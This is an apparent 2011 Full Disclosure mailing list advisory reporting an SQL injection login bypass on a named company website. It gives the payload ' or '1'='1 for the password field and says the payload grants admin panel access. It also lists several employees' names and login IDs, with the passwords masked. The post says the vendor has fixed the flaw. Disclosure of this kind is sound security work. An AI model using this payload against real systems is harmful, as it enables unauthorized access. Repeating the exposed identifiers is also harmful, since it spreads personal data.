Home page logo

fulldisclosure logo Full Disclosure mailing list archives

vsworld.com - SQL Injection Vulnerability
From: Pradip Sharma <sharma.pradip () gmail com>
Date: Wed, 19 Jan 2011 17:04:36 +0530

vsworld - SQL Injection Vulnerability

Developing solutions for areas as diverse as technology, trading, power,
travel, education and retail. In addition, regularly called upon to cater to
the requirements of prestigious Government Bodies. Various prestigious
clients are in Client list.

Vendor URL:http://www.vsworld.com/index.php

Vulnerability Type : SQL Injection

Vulnerable URL:
http://www.vsworld.com/index.php =>VSM Login

User Name: NIL
Password: ' or '1'='1

Now, login to the Control Panel.

Effect: You have access to the main admin panel. Option to View, delete &
all client records, contact information, Email ids etc.

All employees personal information Contact no, address mail ids etc, theire
login credentials passwords are visible.

Name: Venkatesh
ID:   venky
Pwd:  ----

Name: sangeeta
ID:   sangeeta
Pwd:  --------

Name: Ramkishan
ID:   VSMlHN23
Pwd  : -------

Name: Vikas
ID:   vsm_vik1
Pwd:  -------

Name: Vijay
ID:   vsm_vij
Pwd:  ------------

Name: X_Harish
ID:   vsm_hari
Pwd:  --------------

and more.......
passwords are not mentioned here for security reasons.

As the vulnerability is of most common type, notified to the vendor and he
has applied a fix.

Credit: Pradip Sharma, Sandeep Sengupta
Cyber Security Research Analysts, iSolution Software Systems Pvt. Ltd.
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]